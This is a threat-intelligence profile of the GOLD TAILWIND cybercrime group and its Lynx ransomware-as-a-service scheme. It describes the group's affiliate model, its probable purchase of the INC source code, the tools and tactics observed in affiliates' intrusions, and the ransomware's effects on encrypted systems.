GOLD TAILWIND

GOLD TAILWIND is a cybercrime group that operates the Lynx Ransomware-as-a-Service (RaaS) scheme. It operates on the double extortion model, with affiliates stealing data from victims before encrypting systems and holding it to ransom. The group advertised for affiliates on an underground forum in August 2024, offering them an 80% share of any ransom payment. It named its first victim on a leak site a month earlier and has listed victims at an average of around 20 a month since then.

Given the similarities between the INC and Lynx ransomware binaries, early third-party reporting suggested that Lynx might be a rebrand of the INC Ransom scheme operated by GOLD IONIC. However, Lynx emerged a few months after the source code for INC was offered for sale on an underground forum. It is likely that GOLD TAILWIND purchased the code to build Lynx, and the groups are otherwise unaffiliated; both continue to name victims on their respective leak sites.

As GOLD TAILWIND relies on affiliates to gain access to networks and deploy ransomware, CTU researchers have observed a variety of tools and tactics, techniques, and procedures (TTPs) used in Lynx ransomware deployments. These include brute-forcing SSL VPN accounts or relying on initial access brokers (IAB) for access, the use of legitimate remote monitoring and management (RMM) tools like AnyDesk and SimpleHelp, and post-exploitation frameworks like Cobalt Strike. Affiliates create their own administrator accounts for persistence, and have used custom backdoors for command and control (C2).

Affiliates use off-the-shelf tools like Advanced IP Scanner and the SoftPerfect Network Scanner for discovery and move laterally using remote desktop protocol (RDP) and server message block (SMB). For credential access, attackers have used the common tool Mimikatz and PowerShell scripts to scrape credentials from MSSQL databases. Affiliates evade defenses by disabling endpoint detection and response (EDR) solutions, including Windows Defender. The 7-Zip file archive tool has been used to collect files before exfiltrating them using MEGAsync or Rclone.

Lynx ransomware is based on the source code for INC and has variants that can be used to encrypt files on Windows, Linux and VMware ESXi systems. It can be configured through command line arguments and, on deployment, deletes shadow copies, appends the .lynx extension to encrypted files, drops a ransom note called README.txt, and changes the desktop wallpaper to contain the same information.